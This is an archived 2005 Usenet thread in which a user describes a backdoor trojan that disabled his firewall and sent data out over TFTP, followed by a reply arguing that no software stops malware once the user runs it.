Re: Is complete home security possible?

From: Duane Arnold (notme_at_notme.com)
Date: 02/06/05 

Date: Sun, 06 Feb 2005 09:50:38 GMT

joesamang@address.com (Joe Samangitak) wrote in
news:5e231d22.0502060005.67636755@posting.google.com:

> Joe <noone@no.com> wrote in message
> news:<20050205173357.762$Nt@news.newsreader.com>...
>> Joe Samangitak wrote:
>> > I recently got hit by a trojan (Kaspersky called it
>> > "Backdoor.Win32.rBot.Gen"). I saw this thing either take over my
>> > TFTP program (or install one of its own). It installed several
>> > programs on my HD to start up with Windows (XP Pro), like
>> > "IEXPLOREUP.EXE", and used them to transfer data out to the net,
>> > via TFTP. Exactly what it was transferring, I have no idea. I have
>> > since renamed Windows TFTP.EXE file, because I don't know why it is
>> > even there, if it can be exploited so easily by hackers. My
>> > security before this occurred was Kerio 2.1 as a firewall (always
>> > made sure I got 100% stealth ports on GRC's "ShieldsUp!" test),
>> > Kaspersky (always ensure my definitions are updated), and for good
>> > measure, GIANT AntiSpyware. I have TrojanGuard on the system, but
>> > only use it for scanning, to conserve resources.
>> >
>> > Despite all these measures, some mofo still managed to circumvent
>> > my security. I don't know how, but all I know is at one point, my
>> > firewall and virus program stopped loading with Windows. I don't
>> > know if the trojan somehow disabled them, but I know I didn't take
>> > them out of startup. I just wasn't so quick to put them back and
>> > next thing you know... There was a point where I saw Kerio crash
>> > before my eyes, and then it just took itself out of memory and was
>> > no longer active. Never saw it do that before, and again, I don't
>> > know if the trojan was responsible for this.
>> >
>> > Which leads me to my question: I have a hi-speed connection, and
>> > I'm thinking of
>> > leaving it on all the time (ease & convenience), rather than just
>> > starting it up whenever I do browsing. For this to happen, I would
>> > want to have bulletproof security to where I'm confident my
>> > firewall is not going to go south on me. I don't know yet whether
>> > SP2's Security Center will protect me from hackers trying to
>> > disable my firewall via trojans. What if I have a backup software
>> > firewall in place in case the first one gives out? Is it possible
>> > to acheive a level of software security to where a home user under
>> > XP Pro SP2 can be confident in leaving a hi-speed connection open
>> > without fear of hackers circumventing the security measures? In
>> > other words, WHAT AM I DOING WRONG HERE??!
>> >
>> > Thanks for your opinions.
>>
>>
>> Joe, I want to thank you for writing in here. You're story is kinda
>> heart felt for me cus I am also interested in your question being
>> answered. I don't have any problems, but am curious to see peoples
>> answers for you.
>
> Joe <noone@no.com> wrote in message
> news:<20050205173357.762$Nt@news.newsreader.com>...
>> Joe Samangitak wrote:
>> > I recently got hit by a trojan (Kaspersky called it
>> > "Backdoor.Win32.rBot.Gen"). I saw this thing either take over my
>> > TFTP program (or install one of its own). It installed several
>> > programs on my HD to start up with Windows (XP Pro), like
>> > "IEXPLOREUP.EXE", and used them to transfer data out to the net,
>> > via TFTP. Exactly what it was transferring, I have no idea. I have
>> > since renamed Windows TFTP.EXE file, because I don't know why it is
>> > even there, if it can be exploited so easily by hackers. My
>> > security before this occurred was Kerio 2.1 as a firewall (always
>> > made sure I got 100% stealth ports on GRC's "ShieldsUp!" test),
>> > Kaspersky (always ensure my definitions are updated), and for good
>> > measure, GIANT AntiSpyware. I have TrojanGuard on the system, but
>> > only use it for scanning, to conserve resources.
>> >
>> > Despite all these measures, some mofo still managed to circumvent
>> > my security. I don't know how, but all I know is at one point, my
>> > firewall and virus program stopped loading with Windows. I don't
>> > know if the trojan somehow disabled them, but I know I didn't take
>> > them out of startup. I just wasn't so quick to put them back and
>> > next thing you know... There was a point where I saw Kerio crash
>> > before my eyes, and then it just took itself out of memory and was
>> > no longer active. Never saw it do that before, and again, I don't
>> > know if the trojan was responsible for this.
>> >
>> > Which leads me to my question: I have a hi-speed connection, and
>> > I'm thinking of
>> > leaving it on all the time (ease & convenience), rather than just
>> > starting it up whenever I do browsing. For this to happen, I would
>> > want to have bulletproof security to where I'm confident my
>> > firewall is not going to go south on me. I don't know yet whether
>> > SP2's Security Center will protect me from hackers trying to
>> > disable my firewall via trojans. What if I have a backup software
>> > firewall in place in case the first one gives out? Is it possible
>> > to acheive a level of software security to where a home user under
>> > XP Pro SP2 can be confident in leaving a hi-speed connection open
>> > without fear of hackers circumventing the security measures? In
>> > other words, WHAT AM I DOING WRONG HERE??!
>
> I'm curious to see an answer that helps me out with advice that I
> don't already know.

You're not going to get that advice. There is nothing running on the
computer that's going to stop another program from doing something once
that program has reached the machine and has been executed by the user.
If you have caused the execution of the malware program by clicking on
something that has caused the execution of the malware program whether or
not the click event caused the malware program to drop its payload of
other backdoor programs and they are executed, then it's over as you have
seen.

If you're looking for that magic bullet, it's not there. A malware
program that drops a payload must be executed by the end user in some
kind of shape, form or fashion. It just doesn't happen without the
assistance of the end user.

The buck stops with you and it doesn't stop anywhere else.

Duane :)